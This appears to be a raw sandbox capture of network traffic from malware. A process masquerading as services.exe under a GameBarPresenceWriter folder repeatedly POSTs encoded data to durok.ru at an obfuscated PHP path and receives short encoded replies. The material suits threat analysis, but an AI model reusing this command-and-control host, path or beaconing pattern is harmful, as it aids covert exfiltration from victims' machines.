                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RjWpd3soPuSJ2AjT%2FaGedHT0DUHfDoi2RISvbW2sP%2FtGhGB4wzbzJLGK0IUVggAdNMy5XqL0rqVmHsRHK655RsSbfXFQqG5M27VOd0w%2Bj6ozJn07ygk7PPlWFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82615bec9d43c9-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3288&min_rtt=1766&rtt_var=3706&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=104704&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 11 3e 17 06 0b 37 02 30 1d 3c 03 2a 14 2a 32 21 5d 2b 31 29 5d 2b 2f 07 0c 3f 2b 33 57 20 04 2a 59 29 04 2c 10 25 18 26 58 26 21 2e 5c 05 1d 27 5c 3c 02 24 5f 24 22 36 06 29 10 2a 41 29 2d 22 06 30 3f 3f 12 23 5d 3a 15 37 0f 3c 11 3b 05 33 07 2e 5a 20 59 3f 20 2d 05 35 17 21 51 0c 1f 38 56 36 3a 27 5e 27 2e 0b 57 22 33 20 08 25 16 2e 57 22 5d 23 57 30 14 02 02 27 20 3c 0b 23 3e 23 10 28 03 2d 03 32 11 26 04 2a 03 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$>70<**2!]+1)]+/?+3W *Y),%&X&!.\'\<$_$"6)*A)-"0??#]:7<;3.Z Y? -5!Q8V6:'^'.W"3 %.W"]#W0' <#>#(-2&*%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.449745104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:19.501445055 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:19.962798119 CET2548OUTData Raw: 5c 5e 5e 5a 54 59 59 51 5e 58 52 54 56 5e 58 55 54 56 5b 5d 56 54 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \^^ZTYYQ^XRTV^XUTV[]VTSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$?1<)V"2,)Q>B"3;",/#9:\(@(0+%"Z.#Z*
                                                                                                                              Dec 26, 2024 17:17:20.674300909 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:20.930618048 CET794INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:20 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5J%2F94zmmAGtbMqUYz6eAmSfPcmzyt0ejNGphkDBwsNCYFfSW1D2ou5Uf5bn2DWTRNUTVk11zd%2FbdbEdd4pigyqkNcZNQx0NEo35FsFGPgqMKmgCAT2FayZZCxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8261672eec729e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=5014&min_rtt=1958&rtt_var=6847&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=55282&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.449748104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:21.180239916 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:21.537386894 CET2548OUTData Raw: 59 5f 5e 58 54 5a 59 53 5e 58 52 54 56 58 58 57 54 55 5b 5c 56 56 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y_^XTZYS^XRTVXXWTU[\VVSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$?1<6!"/X%>4'X7/, ,:.94>38_*"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:22.360797882 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:22.625031948 CET791INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:22 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nu3u9mu2rN0vyNH8UP90q09Zp0oxN4fAUaDHao5J5ADALmi0V9NUQoilDC3uddPBdmfh9irCGsHjoNKBqieItxevysS5UyGERb3OX9vxXYvShGGjgC8pSlnKkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826171b81543f8-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6904&min_rtt=1683&rtt_var=11074&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=33596&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.449750104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:23.340255022 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2116
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:23.693658113 CET2116OUTData Raw: 5c 5b 5b 5c 54 58 5c 51 5e 58 52 54 56 59 58 52 54 51 5b 5d 56 56 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[\TX\Q^XRTVYXRTQ[]VVS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$^+1<Z(!64_86)B"_'[",7%9:+?0X="Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:24.518815041 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:24.775172949 CET951INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:24 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrGKMTUiFdozZ7pNMXmzwHFjnw%2FsBwbemUc%2FrTiHB7%2BZJ%2BWDOIf%2FsOwtto2OvD5XAxTkEzpIpEi3CcX3VJSvshyj9ZewDM1HozZs%2BQZNWxfdKaHcnQktPglGkw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82617f3aea8ce2-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4763&min_rtt=1795&rtt_var=6609&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2423&delivery_rate=57167&cwnd=201&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 13 3e 00 23 14 22 3c 2b 0d 2b 3e 31 0a 3e 08 3e 04 3c 32 29 5d 28 3c 31 0d 2b 01 3c 0a 37 5c 2e 5a 3d 04 24 13 26 0f 26 5c 25 31 2e 5c 05 1d 27 5d 2b 02 2f 01 26 32 31 1c 29 3e 32 43 28 2e 31 5e 24 2c 37 59 20 02 25 04 23 0f 38 5c 38 3c 3c 13 39 02 0e 1d 2b 20 08 58 35 3d 21 51 0c 1f 38 11 35 5f 27 59 27 3e 29 53 36 30 2b 1c 32 06 2a 54 21 3b 2f 1e 33 39 2f 5d 32 20 3b 1e 22 3d 2b 54 2b 3e 3e 13 25 2c 36 05 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$>#"<++>1>><2)](<1+<7\.Z=$&&\%1.\']+/&21)>2C(.1^$,7Y %#8\8<<9+ X5=!Q85_'Y'>)S60+2*T!;/39/]2 ;"=+T+>>%,6))%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.449751104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:23.405401945 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:23.764278889 CET2548OUTData Raw: 59 5c 5e 5d 54 5b 59 51 5e 58 52 54 56 5b 58 52 54 50 5b 5a 56 54 53 5d 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y\^]T[YQ^XRTV[XRTP[ZVTS]PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z+!<+.";-->Z'$#?0U /1:E(;*"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:17:24.593673944 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:24.857208967 CET794INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:24 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IUheuzDURdp2dMF3hZGjXW1VjWVsbevthpPAlgMXVbeiTc7T04QeOyxBAGnMB%2BTSx8UEVeKFUDepKWuuFQolfwFfVcy3KIJwI%2B6itpa9g3oaJWMaiAlrCskF2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82617fa9c743c7-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3674&min_rtt=1625&rtt_var=4708&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=81012&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.449752104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:25.095046043 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:25.443231106 CET2548OUTData Raw: 59 59 5b 5a 54 58 59 5b 5e 58 52 54 56 5c 58 50 54 52 5b 5e 56 56 53 5a 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY[ZTXY[^XRTV\XPTR[^VVSZPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')2#(9W!Y/W=B2_'?Y4<+"<.Y-:8C? /*5"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:17:26.273561954 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:26.530343056 CET790INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:26 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L45S0SjgWkJoNVtrRHmh61Jv7ccNTMbxdvaQcwJX4qeTicMRqu8stdvzgEHOCA2ilACbc14V2UkZd0zNRiHdj3Ry2ZqawfLz0XU0h7pobzrI8CIoVz2oOyUriQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82618a2a2b7cae-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4374&min_rtt=1998&rtt_var=5502&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=69490&cwnd=194&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.449753104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:26.078680992 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:26.427242994 CET2128OUTData Raw: 5c 5b 5b 5f 54 5b 59 5b 5e 58 52 54 56 5f 58 55 54 56 5b 5a 56 51 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[_T[Y[^XRTV_XUTV[ZVQS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z?W,\<9-!$X8=1P>'!$'/[7<"/>Y.;?V _="Z.#Z*>
                                                                                                                              Dec 26, 2024 17:17:27.111509085 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:27.362562895 CET944INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:27 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UDhhjXL31UR97RiqYDezTiPcjc7C20DkQy8nvDEMwLDJ47a8hJuKp6%2B4lyv41HOY1SXKyrcC2ZJLkZSRC5EkB8RJ%2FaGS75OyaNuFP1MN5cxyNkrJzm1NEgOsYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82618f6c948c3c-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8894&min_rtt=1889&rtt_var=14719&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=25201&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 59 3d 29 09 52 23 12 23 0c 3f 04 31 0e 29 22 3e 06 3f 32 2d 14 3f 3f 07 0a 3f 06 3f 57 23 2a 3a 59 28 29 2c 10 32 36 32 5a 25 21 2e 5c 05 1d 27 5a 3c 15 33 00 24 21 35 5e 3d 07 2e 41 3d 00 1c 06 30 06 2c 00 23 28 3d 04 22 21 3c 58 2c 3f 34 5b 2d 12 3f 01 3f 30 08 1f 23 2d 21 51 0c 1f 38 56 21 00 2f 58 26 2d 3e 0b 36 56 38 08 26 16 29 0b 21 28 23 51 33 3a 23 10 25 23 06 0b 23 04 2f 54 2b 5b 31 01 25 3f 2d 5c 2a 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$Y=)R##?1)">?2-????W#*:Y(),262Z%!.\'Z<3$!5^=.A=0,#(="!<X,?4[-??0#-!Q8V!/X&->6V8&)!(#Q3:#%##/T+[1%?-\*%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.449754104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:17:26.785809040 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:27.132946968 CET2548OUTData Raw: 5c 5b 5b 58 54 59 59 5b 5e 58 52 54 56 58 58 50 54 52 5b 5f 56 50 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[[XTYY[^XRTVXXPTR[_VPSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[<_<)%528!W*4^'4?;7,X-98A+3?*%"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:17:27.963182926 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:28.651643991 CET800INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:28 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EnEQf05NtasD6g%2BmJ6eHrMriQhylWvxZnc%2FYj9qjEAMLtm%2BzTJUWSeuCu0T02wFsuHJ4UGT7K%2BCo612XjsBRu2BwGe18CoNgaRzo5Zf9hESdd8REW%2FlNUZxe4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826194bd8f0f3e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3746&min_rtt=1575&rtt_var=4933&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=77065&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:28.652121067 CET800INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:28 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EnEQf05NtasD6g%2BmJ6eHrMriQhylWvxZnc%2FYj9qjEAMLtm%2BzTJUWSeuCu0T02wFsuHJ4UGT7K%2BCo612XjsBRu2BwGe18CoNgaRzo5Zf9hESdd8REW%2FlNUZxe4Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826194bd8f0f3e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3746&min_rtt=1575&rtt_var=4933&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=77065&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:17:28.896300077 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2092
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:17:29.228991032 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:17:29.230411053 CET2092OUTData Raw: 59 50 5e 59 54 5b 59 54 5e 58 52 54 56 59 58 50 54 5d 5b 54 56 5f 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^YT[YT^XRTVYXPT][TV_S_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'(/(:>"8Z,">7>X3$#? 4Z=-<?#?)%"Z.#Z**
                                                                                                                              Dec 26, 2024 17:17:29.758949995 CET949INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:17:29 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
